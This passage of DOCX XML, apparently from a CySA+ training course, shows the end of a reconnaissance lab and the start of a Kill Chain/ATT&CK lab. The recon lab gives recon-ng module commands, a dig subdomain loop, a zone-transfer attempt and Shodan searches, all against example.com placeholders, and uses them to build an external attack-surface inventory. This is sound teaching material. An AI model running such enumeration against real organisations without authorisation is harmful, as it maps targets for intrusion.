      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[recon-ng][cysa_lab19] &gt; marketplace search hackertarget</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[recon-ng][cysa_lab19] &gt; marketplace install recon/domains-hosts/hackertarget</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[recon-ng][cysa_lab19] &gt; modules load recon/domains-hosts/hackertarget</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[recon-ng][cysa_lab19][hackertarget] &gt; options set SOURCE example.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[recon-ng][cysa_lab19][hackertarget] &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[recon-ng][cysa_lab19][hackertarget] &gt; show hosts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>hackertarget is keyless and free. Other useful modules:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>recon/domains-hosts/hackertarget</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>recon/companies-contacts/whois_pocs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>recon/hosts-hosts/resolve</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>reporting/csv / reporting/html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Export the dataset:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[recon-ng][cysa_lab19] &gt; modules load reporting/csv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[recon-ng][cysa_lab19][csv] &gt; options set FILENAME /tmp/recon.csv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[recon-ng][cysa_lab19][csv] &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — DNS enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for sub in www mail vpn admin api dev staging test mx ftp; do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ip=$(dig +short $sub.example.com)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  [ -n "$ip" ] &amp;&amp; echo "$sub.example.com -&gt; $ip"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>done</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dig axfr @ns.example.com example.com 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The second command attempts a zone transfer. A successful AXFR from an external client is a misconfiguration — instant report finding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Shodan-style passive port discovery (browser)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Free tier (sign up required):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Shodan — https://www.shodan.io/search?query=org%3A%22Example+Inc%22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Censys — https://search.censys.io</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Search by organisation name, ASN, or domain. You will see open ports, banner versions, certs, and geolocation — all without sending a packet from your IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Inventory the findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mkdir -p /tmp/lab19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; /tmp/lab19/inventory.md &lt;&lt;EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># External attack surface: example.com (snapshot $(date -I))</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Asset | Port | Service | Source | Risk note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www.example.com | 443 | nginx | crt.sh, dig | TLS expiring soon |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| api.example.com | 443 | api gateway | crt.sh | Public, monitor |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| admin.example.com | 8443 | admin panel | crt.sh | Should be VPN-only |</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cat /tmp/lab19/inventory.md</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This is the deliverable a SOC analyst hands to the vulnerability-management team.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 8 — Map the lab to CySA+ 2.5 bullet points</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lab step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CySA+ 2.5 vocab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>theHarvester / crt.sh / DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Edge discovery, Passive discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recon-ng hackertarget</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Passive discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Shodan / Censys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Passive discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Nmap (Lab 11) on these hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Security controls testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Metasploit (Lab 15) check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Penetration testing, Adversary emulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Public program</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Bug bounty</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Use theHarvester and crt.sh for passive subdomain discovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Drive Recon-ng's workspace/module model and export reports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Combine DNS, certificate transparency, and Shodan-style services into a single external inventory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Map enumeration techniques to CySA+ attack-surface-management vocabulary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Browser-Based Tools (Tertiary Infotech)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>These free browser tools complement this lab — no install required:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ethical Hacking Playground (https://alfredang.github.io/ethnicalhacking/) — a browser playground of common ethical-hacking techniques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>*In this lab:* Use the Ethical Hacking Playground and PenTest FauxBank to explore the reconnaissance and enumeration techniques in the browser before running theHarvester/recon-ng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PenTest FauxBank (https://pentest-fauxbank.vercel.app/) — a deliberately-vulnerable demo banking web app for safe web-attack practice.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>*In this lab:* Map the attack surface of the PenTest FauxBank demo app as a browser-based warm-up for the recon workflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to use theHarvester and crt.sh for passive subdomain discovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Topic 3: Incident Response and Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CompTIA CySA+ CS0-003 exam weighting: 20%. Hands-on Labs 20–25.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 20 — Cyber Kill Chain and ATT&amp;CK Mapping</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walk a single intrusion scenario through Lockheed Martin's Cyber Kill Chain, then map the same scenario to the MITRE ATT&amp;CK Navigator and the Diamond Model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will walk a single intrusion scenario through Lockheed Martin's Cyber Kill Chain, then map the same scenario to the MITRE ATT&amp;CK Navigator and the Diamond Model. This maps to CySA+ 3.1 (Cyber kill chains, Diamond Model of Intrusion Analysis, MITRE ATT&amp;CK, OSSTMM, OWASP Testing Guide).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This lab runs in the browser plus a small markdown file — no shell required.</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Web — MITRE ATT&amp;CK Navigator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4937760" cy="6283078"/>
            <wp:docPr id="15" name="Picture 15"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_34df8d5619.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="6283078"/>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4937760" cy="2375555"/>
            <wp:docPr id="16" name="Picture 16"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_0605d5ac69.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
